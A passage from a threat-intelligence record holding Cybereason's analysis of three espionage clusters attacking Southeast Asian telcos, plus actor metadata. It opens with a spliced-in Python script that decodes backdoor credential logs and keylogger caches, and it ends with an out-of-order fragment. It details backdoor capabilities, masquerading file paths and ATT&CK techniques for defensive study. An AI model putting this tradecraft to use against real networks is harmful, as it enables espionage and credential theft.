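        lines.append(base64.b64encode(obfuscated).decode('ascii'))
    return '\n'.join(lines)


# Constructed records in the layout of the decoded log samples shown in the report.
CONSTRUCTED_RECORDS = [
    '1/1/2021 5:32:22 PM 198.51.100.23 jdoe Winter2021! Mozilla/5.0 (Windows NT 10.0; Win64; x64) '
    'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66',
    '1/2/2021 9:05:41 AM 198.51.100.45 svc-owa Spring#2021 Mozilla/5.0 (Windows NT 6.1; WOW64) '
    'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36',
]
SAMPLE_EX_DAT = build_ex_dat(CONSTRUCTED_RECORDS)

if __name__ == '__main__':
    for r in parse_owa_log(SAMPLE_EX_DAT):
        print(r['timestamp'], r['remote_ip'], r['username'], r['user_agent'][:40])
    cache = encode_enrolllogger(b'admin\tWinter2021!\r\n' + bytes(4))
    print(decode_enrolllogger(cache))
```

The keylogger scheme is worth a caveat when recovering evidence: 0x00 and 0x05 both encrypt to 0xaf, so the decoder maps 0xaf back to 0x00, which is right for keystroke and clipboard text but means a genuine ENQ byte cannot be recovered. For ~ex.dat, decoding each line separately keeps the parser working whether the backdoor appends one blob per record or rewrites a single blob.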
If the attacker connects to the server with a specifically crafted session ID, the attacker’s HTTP request is parsed in order to execute various commands, such as:\r\nDownloading additional files\r\nUploading files (for data exfiltration)\r\nDeleting files\r\nExecuting arbitrary commands via a CMD shell\r\nSimilarities with Iron Tiger OWA Backdoors\r\nThe “Microsoft.Exchange.Clients.Event.dll” backdoor discussed in this section exhibits both code and functional similarities to a module named “Microsoft.Exchange.Clients.Auth.dll” that is described in a presentation by Steven Adair and in a paper by Trend Micro about operation “Iron Tiger”, which describe sophisticated custom .NET backdoors dubbed “Dllshellexc2007” and “Dllshellexc2010”:\r\nExample of similar code shared between the two modules\r\nIn addition, the credentials log file created by both modules is very similar in its structure and collected data:\r\nIron Tiger Backdoor - decoded log file of “Microsoft.Exchange.Clients.Auth.dll” (“Dllshellexc2007” and “Dllshellexc2010” backdoors):\r\n239073 3/2/2015 10:22:09 AM x.x.x.x \u003caccount name\u003e \u003cpassword\u003e Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nCluster C OWA Backdoor - decoded log file of “Microsoft.Exchange.Clients.Event.dll”:\r\n1/1/2021 5:32:22 PM x.x.x.x \u003caccount name\u003e \u003cpassword\u003e Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66\r\nFurther Connections to Chinese Threat Actors\r\nDuring our analysis of the different clusters, we noticed interesting connections and similarities to known Chinese threat actors. 
In the interest of providing broader context, we decided to share our observations in the hope that they will enable other researchers to draw their own conclusions as to the relevance of our findings.\r\nConnections to Winnti’s Tools and Infrastructure\r\nConnections Between Naikon APT Nebulae Backdoor and Winnti’s ShadowPad Infrastructure\r\nWhen examining a Nebulae backdoor sample (likely not related to this attack), we noticed that one of the domains contacted by the backdoor is ttareyice.jkub[.]com. This domain was previously mentioned in a detailed report about the activity of the Winnti group and its relations to other threat groups. It is also worth mentioning that Winnti is known to attack telecommunications companies. Read together with that report, this is additional evidence of Winnti sharing its infrastructure, this time between a ShadowPad sample attributed to Winnti and the Nebulae backdoor, reportedly attributed to Naikon:\r\nNebulae and ShadowPad mutual infrastructure\r\nUse of PcShare Backdoor in Previous Winnti-Related Attacks\r\nAnother possible connection to Winnti’s ShadowPad backdoor is via the usage of a customized PcShare backdoor that was found on multiple endpoints in Cluster A described in this report. In October 2020, Dr. Web released a report detailing targeted attacks in Kazakhstan and Kyrgyzstan involving Winnti’s ShadowPad backdoor. That same report also mentions a backdoor dubbed “BackDoor.Farfli.125” that was deployed alongside the ShadowPad payloads. Our analysis of the “BackDoor.Farfli.125” backdoor concluded that it is a variant of the open-source PcShare backdoor.\r\nFrom a tradecraft perspective, it is interesting to note that the attackers in the aforementioned Dr. Web report also chose to use a loader that masquerades as a legitimate NVIDIA product, as shown in Cluster A of our report. 
\r\nPossible Connection Between APT41 and Soft Cell\r\nWhile pivoting from indicative PDB paths of the tools used by Soft Cell (listed in Appendix A; some were also observed by Markus Neis), we came across additional binaries that share code similarities with another malware named ChipShot, attributed to APT41 (tracked by some vendors as Winnti). ChipShot is a .NET binary that drops a modified China Chopper WebShell, which is stored in the resource section of the file.\r\nExamples of the pivoted PDB paths:\r\nE:\\vs_proj\\DeployFilter_NET2.0\\DeployFilter\\obj\\Release\\DeployFilter.pdb - ChipShot Dropper\r\nE:\\vs_proj\\serviceFilter_NET2.0\\serviceFilter\\obj\\Release\\serviceFilter.pdb - Modified ChinaChopper webshell\r\nIt is worth noting that APT41 was also reported targeting telecommunications organizations in the past, and was suggested to be linked to the previous Soft Cell campaign from 2019. The group was also reported abusing an NVIDIA product (nvSmartEx.exe) for DLL side-loading, the same product that was abused in Cluster A:\r\nCode snippet from ChipShot Dropper: edits the IIS applicationHost.config file\r\nCode snippet from Modified ChinaChopper WebShell\r\nPossible Connection Between Tropic Trooper and Soft Cell\r\nAs previously mentioned in our report, one of the PcShare payloads analyzed had the same hash as a sample mentioned in a report by BlackBerry from 2019. In both instances, the attackers used the exact same DLL search order hijacking technique with a fake NVIDIA product.\r\nAside from the forensic evidence, the geographical locations of the attacks and the timeline also point to a strong tie between the BlackBerry report and this report. 
BlackBerry hypothesized that the threat actor behind the attack was Tropic Trooper; however, as mentioned in their report, they could not establish that attribution with high certainty.\r\nAt this point, we can conclude that both intrusions were carried out by the same threat actor, which had access to the same code and used identical tradecraft. Whether Tropic Trooper and Soft Cell are the same actor remains unclear at the moment, since we could not verify the BlackBerry attribution.\r\nPossible Connection Between Cluster B and an Older Phishing Attempt\r\nThe custom keylogger mentioned in Cluster B of this report was executed by a fake svchost.exe process located in a rather unusual folder:\r\nc:\\program files (x86)\\internet explorer\\svchost.exe (SHA-1: 91b0d7fa50d993c7a35ec501ef5f3585f0003a51)\r\nAside from the unusual location, the file also contained a few typos in its metadata fields (“Coporation”, “Widows”):\r\nTypos found in metadata fields of the fake svchost.exe\r\nPivoting on these specific typos, file name and version, we were able to find a sample in VirusTotal, uploaded from Vietnam in October 2016, that is called “svchost.exe” and contains the same typos and file version. Interestingly, the sample’s in-the-wild name is “1 Military Alliance Utilizing ASEAN Plus 3 as Platform An Appraisal for Prospects.exe”:\r\nUpon execution, the sample unpacks the following into the %TEMP% folder:\r\nA decoy PDF file\r\nAn unknown backdoor masquerading as a legitimate Windows binary, wmiprvse.exe (SHA-1: 5572fa29e61009a626320275b36eef0d5142e3e2)\r\nDecoy PDF file\r\nThe decoy PDF file contains questions and answers regarding a known geopolitical territorial dispute in the South China Sea, and particularly discusses the Chinese territorial dispute with the Philippines. 
\r\nWhile this could be merely a coincidence, the probability of two samples sharing the exact same typos, file name and version, both related to China, does seem peculiar, especially since the Naikon APT group that we believe is behind Cluster B is known to have attacked countries of the South China Sea, including Vietnam and the Philippines; we therefore thought it worth mentioning.\r\nAttribution\r\nAttributing Clusters A, B and C\r\nAfter analyzing all of the data we accumulated through our platform, incident response efforts, malware analysis, and threat intelligence, we were able to define three distinct clusters of malicious activity. Each cluster is characterized by its own set of TTPs and infrastructure, and according to our analysis they appear to have operated independently:\r\nCluster A: Attributed to the Soft Cell Activity Group\r\nBased on the evidence provided in this report as well as internal and publicly available information, Cybereason assesses with a high level of confidence that the intrusions detailed in this cluster are consistent with previous activities carried out by the Soft Cell activity group. Soft Cell has not yet been attributed to a specific threat actor; however, it is assessed that the group operates on behalf of Chinese state interests. As shown in our report, there are some interesting links between the Soft Cell activity group and the APT41/Winnti threat actor; nevertheless, at the time of writing this report, there is not enough evidence to tie the two with sufficient certainty.\r\nCluster B: Suspected to be the Naikon APT Group\r\nBased on the information provided in this report as well as publicly available information regarding the Naikon APT threat actor’s activity, Cybereason assesses with moderate confidence that the intrusions detailed in this cluster were carried out by the Naikon APT group. 
\r\nCluster C: Potentially Related to Group-3390 (also tracked as Emissary Panda, APT27)\r\nBased on the information provided in this report, Cybereason assesses with low-to-moderate confidence that the intrusions detailed in this cluster were carried out by a threat actor who had access to the code of the “Dllshellexc2007” and “Dllshellexc2010” backdoors detailed in operation “Iron Tiger” and attributed by Trend Micro to Group-3390.\r\nThat being said, we cannot ignore certain interesting overlaps between the aforementioned clusters. In one particular instance, Cybereason observed all three clusters in the same environment, and in some cases even operating on the same endpoints around similar time frames. Whether this is merely a coincidence, or the clusters are somehow interconnected, is not entirely clear at this point in time.\r\nAmong the three clusters, we lean towards the possibility that Clusters A and C might be connected, based on the fact that they have been operating in the same environment for over three years (since 2017/2018), while Cluster B only emerged in Q4 2020. In addition, the OWA backdoor described in Cluster C was previously shown to interact with the China Chopper WebShell that was used extensively in Cluster A.\r\nBased on our understanding and past experience with Chinese threat actors, there are several hypotheses that might explain those overlaps:\r\nOne hypothesis is that the clusters represent the work of two or more teams with different sets of expertise (e.g. an initial access team, a foothold team, a telco-technology specialized team, etc.), all working together and reporting to the same Chinese threat actor.\r\nA second hypothesis is that there are two or more Chinese threat actors with different agendas or tasks that are aware of each other’s work and potentially even working in tandem. 
\r\nAnother plausible hypothesis is that the clusters are not interconnected and that the threat actors are working independently with no collaboration, or are even piggybacking on the access achieved by one of the other actors involved.\r\nOne thing that remains consistent and evident in all three clusters is that they all point to threat actors that are believed to be operating on behalf of Chinese state interests. It is also not surprising that the Telcos targeted in these intrusions are located in ASEAN countries, some of which have long-term, publicly known disputes with the PRC (People’s Republic of China).\r\nA Note on CTI Attribution\r\nIn the world of threat intelligence, attribution is often not an exact science and should be continuously re-assessed over time as new information emerges that can shed more light on the identity of the threat actors. Therefore, we encourage our readers to use the information provided in this report and draw their own conclusions. In our attribution, inspired by the well-known Diamond Model, we have taken into account the following aspects of the intrusions: victimology (location, industry), capabilities (mainly tools, techniques and procedures) and infrastructure.\r\nWhen analyzing intrusions that happened over years, it is often difficult to separate one kill chain from another even when there is just a single threat actor. With the possibility of more than one threat actor operating in the same environment, this task can be even more daunting, and oftentimes it can be tempting to treat everything as part of one larger attack originating from the same threat actor, which could lead to misattribution. We encourage other analysts to work with a well-defined attribution model that can make the fickle task of attribution less prone to mistakes and biases. 
\r\nConclusion\r\nIn this blog we uncovered three clusters of intrusions targeting Telcos in ASEAN countries that were active for several years, with one cluster going back as far as 2017. We assess that the goal behind the intrusions was to facilitate cyber espionage efforts by gaining access to cellular providers for the purpose of exfiltrating sensitive data about the targeted companies and their customers.\r\nEach cluster appears to have its own unique characteristics, distinguishing it from the other clusters detailed in this report. In our report, we also mention the interesting overlaps observed among those clusters, namely the targeting of the same victims, operating around similar time frames, and in some cases the existence of all three clusters on the same endpoints.\r\nAccording to our analysis, Cluster A was executed by the Soft Cell activity group, a group that is known to have attacked Telcos in the past in multiple regions and is believed to be operating on behalf of Chinese state interests. The intrusions in this cluster span over three years, going back to 2018. The attackers behind it have shown great resourcefulness and adaptiveness in light of mitigation efforts, finding their way back in repeatedly, which may demonstrate how important it was for them to obtain the data from the targeted Telcos.\r\nCluster B was discovered in late 2020 and exhibited a different set of tools and techniques, including the rare Nebulae backdoor and the previously undocumented EnrollLogger keylogger. We suspect that the activity in this cluster was carried out by the Naikon APT group, a very active cyber espionage group previously attributed to the Chinese People’s Liberation Army (PLA).\r\nCluster C is the oldest among the clusters, with first signs of intrusions going back to 2017. 
This cluster exhibited a rare OWA backdoor that shows considerable code and functionality similarities to previously documented backdoors that were used by Group-3390 (APT27), an infamous cyber espionage APT group operating on behalf of Chinese state interests.\r\nWhether these clusters are in fact interconnected or operated independently from each other is not entirely clear at the time of writing this report. We offered several hypotheses that can account for these overlaps, hoping that as time goes by more information will be made available to us and to other researchers that will help to shed light on this conundrum.\r\nResearchers\r\nLIOR ROCHBERGER, SENIOR THREAT RESEARCHER\r\nAs part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and malware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including Bitbucket, Valak, Ramnit, and Raccoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force.\r\nTOM FAKTERMAN, THREAT RESEARCHER\r\nTom Fakterman, Cyber Security Analyst with the Cybereason Nocturnus Research Team, specializes in protecting critical networks and incident response. Tom has experience in researching malware, computer forensics and developing scripts and tools for automated cyber investigations.\r\nDANIEL FRANK, SENIOR MALWARE RESEARCHER\r\nWith a decade in malware research, Daniel uses his expertise in malware analysis and reverse engineering to understand APT activity and commodity cybercrime attackers. Daniel has previously shared research at RSA Conference, the Microsoft Digital Crimes Consortium, and Rootcon.\r\nASSAF DAHAN, HEAD OF THREAT RESEARCH\r\nAssaf has over 15 years in the InfoSec industry. He started his career in the Israeli Military 8200 Cybersecurity unit where he developed extensive experience in offensive security. 
Later in his career he led Red Teams, developed penetration testing methodologies, and specialized in malware analysis and reverse engineering.\r\nIndicators of Compromise\r\nThe DeadRinger IOCs and Appendix A are available through the chatbot on the bottom right corner of the original report page.\r\nMITRE ATT\u0026CK BREAKDOWN (Cluster A - Soft Cell Activity)\r\nReconnaissance: Gather Victim Host Information; Active Scanning; Gather Victim Network Information\r\nInitial Access: Exploit Public-Facing Application\r\nExecution: Command-line Interface; Windows Management Instrumentation; PowerShell\r\nPersistence: WebShell; Create Account; Scheduled Task\r\nPrivilege Escalation: Valid Accounts; WebShell\r\nDefense Evasion: Hijack Execution Flow; Indicator Removal from Tools; Obfuscated Files or Information; Masquerading; Indicator Removal on Host: Timestomp\r\nLateral Movement: Windows Admin Shares; Pass the Hash; Remote File Copy\r\nCredential Access: Credential Dumping; Credentials from Password Stores\r\nDiscovery: System Network Configuration Discovery; Remote System Discovery; Account Discovery; Permission Groups Discovery\r\nMITRE ATT\u0026CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity)\r\nReconnaissance: Gather Victim Host Information; Active Scanning; Gather Victim Network Information\r\nExecution: Command-line Interface; Windows Management Instrumentation; System Services\r\nPersistence: Windows Service\r\nPrivilege Escalation: Valid Accounts\r\nDefense Evasion: DLL Side-Loading; Indicator Removal from Tools; Masquerading\r\nLateral Movement: SMB/Windows Admin Shares; Lateral Tool Transfer\r\nCredential Access: Keylogging; Credential Dumping\r\nDiscovery: System Network Configuration Discovery; Remote System Discovery; Account Discovery; Permission Groups Discovery\r\nCommand and Control: Encrypted Channel\r\nMITRE ATT\u0026CK BREAKDOWN (Cluster C - Custom OWA Backdoor)\r\nExecution: Command-line Interface\r\nPersistence: Web Shell\r\nDefense Evasion: Masquerading; Deobfuscate/Decode Files or Information\r\nCredential Access: Network Sniffing\r\nDiscovery: Account Discovery; Remote System Discovery\r\nCommand and Control: Web Protocols\r\nExfiltration: Exfiltration Over C2 Channel\r\nAbout the Author\r\nCybereason Nocturnus\r\nThe Cybereason Nocturnus Team has brought the world’s brightest minds from the military, government intelligence, and enterprise security to uncover emerging threats across the globe. They specialize in analyzing new attack methodologies, reverse-engineering malware, and exposing unknown system vulnerabilities. The Cybereason Nocturnus Team was the first to release a vaccination for the 2017 NotPetya and Bad Rabbit cyberattacks.\r\nSource: https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\r\nPhase 4: Changes (fragment from page 11 of the original report, placed here out of order by extraction)\r\nThe only addition in TTPs observed in phase four compared to previous phases is that the attackers once again used a different Mimikatz executable, named d64.exe. It was found in both folders: c:\\windows\\d64.exe and c:\\compaq\\d64.exe.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
	],
	"report_names": [
		"deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
	],
	"threat_actors": [
		{
			"id": "81d49904-579d-45b3-ace2-1fdf0a713bc4",
			"created_at": "2022-10-25T15:50:23.331457Z",
			"updated_at": "2026-04-10T02:00:05.291098Z",
			"deleted_at": null,
			"main_name": "Leafminer",
			"aliases": [
				"Leafminer",
				"Raspite"
			],
			"source_name": "MITRE:Leafminer",
			"tools": [
				"LaZagne",
				"Mimikatz",
				"MailSniper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "552eeef7-4a19-44de-9147-db8893c115ef",
			"created_at": "2023-01-06T13:46:38.598788Z",
			"updated_at": "2026-04-10T02:00:03.034846Z",
			"deleted_at": null,
			"main_name": "RASPITE",
			"aliases": [
				"LeafMiner",
				"Raspite"
			],
			"source_name": "MISPGALAXY:RASPITE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5bbced13-72f7-40dc-8c41-dcce75bf885e",
			"created_at": "2022-10-25T15:50:23.695735Z",
			"updated_at": "2026-04-10T02:00:05.335976Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"Winnti Group"
			],
			"source_name": "MITRE:Winnti Group",
			"tools": [
				"PipeMon",
				"Winnti for Windows",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "13354d3f-3f40-44ec-b42a-3cda18809005",
			"created_at": "2022-10-25T15:50:23.275272Z",
			"updated_at": "2026-04-10T02:00:05.36519Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"APT3",
				"Gothic Panda",
				"Pirpi",
				"UPS Team",
				"Buckeye",
				"Threat Group-0110",
				"TG-0110"
			],
			"source_name": "MITRE:APT3",
			"tools": [
				"OSInfo",
				"schtasks",
				"PlugX",
				"LaZagne",
				"SHOTPUT",
				"RemoteCMD"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "761d1fb2-60e3-46f0-9f1c-c8a9715967d4",
			"created_at": "2023-01-06T13:46:38.269054Z",
			"updated_at": "2026-04-10T02:00:02.90356Z",
			"deleted_at": null,
			"main_name": "APT3",
			"aliases": [
				"GOTHIC PANDA",
				"TG-0110",
				"Buckeye",
				"Group 6",
				"Boyusec",
				"BORON",
				"BRONZE MAYFAIR",
				"Red Sylvan",
				"Brocade Typhoon"
			],
			"source_name": "MISPGALAXY:APT3",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b69484be-98d1-49e6-aed1-a28dbf65176a",
			"created_at": "2022-10-25T16:07:23.886782Z",
			"updated_at": "2026-04-10T02:00:04.779029Z",
			"deleted_at": null,
			"main_name": "Naikon",
			"aliases": [
				"G0019",
				"Hellsing",
				"ITG06",
				"Lotus Panda",
				"Naikon",
				"Operation CameraShy"
			],
			"source_name": "ETDA:Naikon",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"AR",
				"ARL",
				"Agent.dhwf",
				"Aria-body",
				"Aria-body loader",
				"Asset Reconnaissance Lighthouse",
				"BackBend",
				"Creamsicle",
				"Custom HDoor",
				"Destroy RAT",
				"DestroyRAT",
				"Flashflood",
				"FoundCore",
				"Gemcutter",
				"HDoor",
				"JadeRAT",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"LadonGo",
				"Lecna",
				"Living off the Land",
				"NBTscan",
				"Naikon",
				"NetEagle",
				"Neteagle_Scout",
				"NewCore RAT",
				"Orangeade",
				"PlugX",
				"Quarks PwDump",
				"RARSTONE",
				"RainyDay",
				"RedDelta",
				"RoyalRoad",
				"Sacto",
				"Sandboxie",
				"ScoutEagle",
				"Shipshape",
				"Sisfader",
				"Sisfader RAT",
				"Sogu",
				"SslMM",
				"Sys10",
				"TIGERPLUG",
				"TVT",
				"TeamViewer",
				"Thoper",
				"WinMM",
				"Xamtrav",
				"XsFunction",
				"ZRLnk",
				"nbtscan",
				"nokian",
				"norton",
				"xsControl",
				"xsPlus"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a2912fc0-c34e-4e4b-82e9-665416c8fe32",
			"created_at": "2023-04-20T02:01:50.979595Z",
			"updated_at": "2026-04-10T02:00:02.913011Z",
			"deleted_at": null,
			"main_name": "Naikon",
			"aliases": [
				"BRONZE STERLING",
				"G0013",
				"PLA Unit 78020",
				"OVERRIDE PANDA",
				"Camerashy",
				"BRONZE GENEVA",
				"G0019",
				"Naikon"
			],
			"source_name": "MISPGALAXY:Naikon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc",
			"created_at": "2023-01-06T13:46:38.354607Z",
			"updated_at": "2026-04-10T02:00:02.939761Z",
			"deleted_at": null,
			"main_name": "APT23",
			"aliases": [
				"BRONZE HOBART",
				"G0081",
				"Red Orthrus",
				"Earth Centaur",
				"PIRATE PANDA",
				"KeyBoy",
				"Tropic Trooper"
			],
			"source_name": "MISPGALAXY:APT23",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bef7800a-a08f-4e21-b65c-4279c851e572",
			"created_at": "2022-10-25T15:50:23.409336Z",
			"updated_at": "2026-04-10T02:00:05.319608Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"Tropic Trooper",
				"Pirate Panda",
				"KeyBoy"
			],
			"source_name": "MITRE:Tropic Trooper",
			"tools": [
				"USBferry",
				"ShadowPad",
				"PoisonIvy",
				"BITSAdmin",
				"YAHOYAH",
				"KeyBoy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "945a572f-ebe3-4e2f-a288-512fe751cfa8",
			"created_at": "2022-10-25T16:07:24.413971Z",
			"updated_at": "2026-04-10T02:00:04.97924Z",
			"deleted_at": null,
			"main_name": "Winnti Group",
			"aliases": [
				"G0044",
				"Leopard Typhoon",
				"Wicked Panda",
				"Winnti Group"
			],
			"source_name": "ETDA:Winnti Group",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"FunnySwitch",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9f1ce7e3-77cd-4af0-bedb-1643f55c9baf",
			"created_at": "2022-10-25T15:50:23.31611Z",
			"updated_at": "2026-04-10T02:00:05.370146Z",
			"deleted_at": null,
			"main_name": "Naikon",
			"aliases": [
				"Naikon"
			],
			"source_name": "MITRE:Naikon",
			"tools": [
				"ftp",
				"netsh",
				"WinMM",
				"Systeminfo",
				"RainyDay",
				"RARSTONE",
				"HDoor",
				"Sys10",
				"SslMM",
				"PsExec",
				"Tasklist",
				"Aria-body"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cf826655-5fcb-4331-bdc5-5ef267db9d3c",
			"created_at": "2025-08-07T02:03:24.631402Z",
			"updated_at": "2026-04-10T02:00:03.608938Z",
			"deleted_at": null,
			"main_name": "BRONZE MAYFAIR",
			"aliases": [
				"APT3 ",
				"Gothic Panda ",
				"Pirpi",
				"TG-0110 ",
				"UPSTeam"
			],
			"source_name": "Secureworks:BRONZE MAYFAIR",
			"tools": [
				"Cookiecutter",
				"HUC Proxy Malware (Htran)",
				"Pirpi",
				"PlugX",
				"SplitVPN",
				"UPS",
				"ctt",
				"ctx"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "04b07437-41bb-4126-bcbb-def16f19d7c6",
			"created_at": "2022-10-25T16:07:24.232628Z",
			"updated_at": "2026-04-10T02:00:04.906097Z",
			"deleted_at": null,
			"main_name": "Stone Panda",
			"aliases": [
				"APT 10",
				"ATK 41",
				"Bronze Riverside",
				"CTG-5938",
				"CVNX",
				"Cuckoo Spear",
				"Earth Kasha",
				"G0045",
				"G0093",
				"Granite Taurus",
				"Happyyongzi",
				"Hogfish",
				"ITG01",
				"Operation A41APT",
				"Operation Cache Panda",
				"Operation ChessMaster",
				"Operation Cloud Hopper",
				"Operation Cuckoo Spear",
				"Operation New Battle",
				"Operation Soft Cell",
				"Operation TradeSecret",
				"Potassium",
				"Purple Typhoon",
				"Red Apollo",
				"Stone Panda",
				"TA429",
				"menuPass",
				"menuPass Team"
			],
			"source_name": "ETDA:Stone Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"Anel",
				"AngryRebel",
				"BKDR_EVILOGE",
				"BKDR_HGDER",
				"BKDR_NVICM",
				"BUGJUICE",
				"CHINACHOPPER",
				"ChChes",
				"China Chopper",
				"Chymine",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"DARKTOWN",
				"DESLoader",
				"DILLJUICE",
				"DILLWEED",
				"Darkmoon",
				"DelfsCake",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"Ecipekac",
				"Emdivi",
				"EvilGrab",
				"EvilGrab RAT",
				"FYAnti",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"GreetCake",
				"HAYMAKER",
				"HEAVYHAND",
				"HEAVYPOT",
				"HTran",
				"HUC Packet Transmit Tool",
				"Ham Backdoor",
				"HiddenFace",
				"Impacket",
				"Invoke the Hash",
				"KABOB",
				"Kaba",
				"Korplug",
				"LODEINFO",
				"LOLBAS",
